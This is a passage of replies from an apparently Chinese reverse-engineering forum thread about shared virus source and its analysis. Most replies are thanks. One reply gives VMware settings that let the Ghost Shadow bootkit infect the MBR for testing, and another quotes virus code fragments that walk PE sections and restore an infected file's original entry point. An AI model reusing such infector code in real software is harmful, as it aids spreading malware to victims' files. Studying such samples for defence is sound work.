能力值:
( LV2,RANK:10 )
|
-
-
2 楼
谢谢分享。偶拿了一次。。
|
能力值:
(RANK:350 )
|
-
-
3 楼
感谢分享~
对于病毒/木马分析类的文章,很希望看到这样的文章结构:
1.病毒/木马的描述
2.病毒/木马 逆向分析,如感染机制、破坏机制等
3.再给出解决方法,如病毒/木马的清除等
4.如果可能,写个专杀工具,最好带源码。
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
受益匪浅啊。
|
能力值:
( LV8,RANK:140 )
|
-
-
5 楼
谢谢分享。这个病毒的破坏思路都很平常,呵呵
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
………………
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
鬼影那里……虚拟机硬盘设置不能是sata……必须是ide
|
能力值:
( LV2,RANK:10 )
|
-
-
8 楼
楼主源码给力呀,佩服
学习
|
能力值:
( LV15,RANK:520 )
|
-
-
9 楼
你朋友不老实啊,毕设要别人帮。。。。
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
怎么又是个 毕设 写病毒的?
|
能力值:
( LV2,RANK:10 )
|
-
-
11 楼
病毒学校????折磨病毒的??
|
能力值:
( LV12,RANK:530 )
|
-
-
12 楼
不错,不错~~嘿嘿~~
|
能力值:
( LV6,RANK:80 )
|
-
-
13 楼
学习分析完,写出对应的清除代码才是高手,学习
|
能力值:
( LV2,RANK:10 )
|
-
-
14 楼
水平不够,不太看得懂
|
能力值:
( LV2,RANK:10 )
|
-
-
15 楼
向楼主学习,多谢分享
|
能力值:
( LV2,RANK:10 )
|
-
-
16 楼
回头我也调试看看
|
能力值:
( LV2,RANK:10 )
|
-
-
17 楼
太强了!感谢分享!
|
能力值:
( LV2,RANK:10 )
|
-
-
18 楼
测试鬼影的时候,把虚拟机硬盘接口调成IDE,在配置文件上加上
monitor_control.disable_directexec = "TRUE"
isolation.tools.getVersion.disable = "TRUE"
这两句话就可以感染MBR了!
|
能力值:
( LV2,RANK:10 )
|
-
-
19 楼
好吧,学习ing
|
能力值:
( LV2,RANK:10 )
|
-
-
20 楼
很神奇,贴些代码观赏
//获取节点个数
_asm
{
PUSHAD
MOV EAX,PeAddr
ADD EAX,0x6
MOV EDX,0x0
MOV DX,WORD PTR [EAX]
MOV jienum,EDX
POPAD
}
lastjie = (int)PeAddr + 0xF8 + (jienum -1)*0x28; //获取最后一个节偏移
lastjieV = *(int*)(lastjie + 0xc) + *(int*)((int)PeAddr +0x34); //虚拟偏移
lastjieF = *(int*)(lastjie + 0x14) + (int)p; //文件偏移
//向前遍历寻找第一个感染节
for(int i = 0;i<10000;i++)
{
relvur -= 0x1000;
if( *(int*)relvur != 0xE8)
{
//就是第一个节
relvur += 0x1000;
i = 10001;
}
}
//恢复真正入口点
*(int*)(relentry + 0x0) = *(int*)(relvur + 0xB2A + 0x0);
*(int*)(relentry + 0x4) = *(int*)(relvur + 0xB2A + 0x4);
*(int*)(relentry + 0x8) = *(int*)(relvur + 0xB2A + 0x8);
*(int*)(relentry + 0xc) = *(int*)(relvur + 0xB2A + 0xc);
为什么不是EXE?
|
能力值:
( LV2,RANK:10 )
|
-
-
21 楼
学习,谢谢楼主分享
|
能力值:
( LV2,RANK:10 )
|
-
-
22 楼
恩 获益匪浅
|
能力值:
( LV2,RANK:10 )
|
-
-
23 楼
学习鸟
|
|
|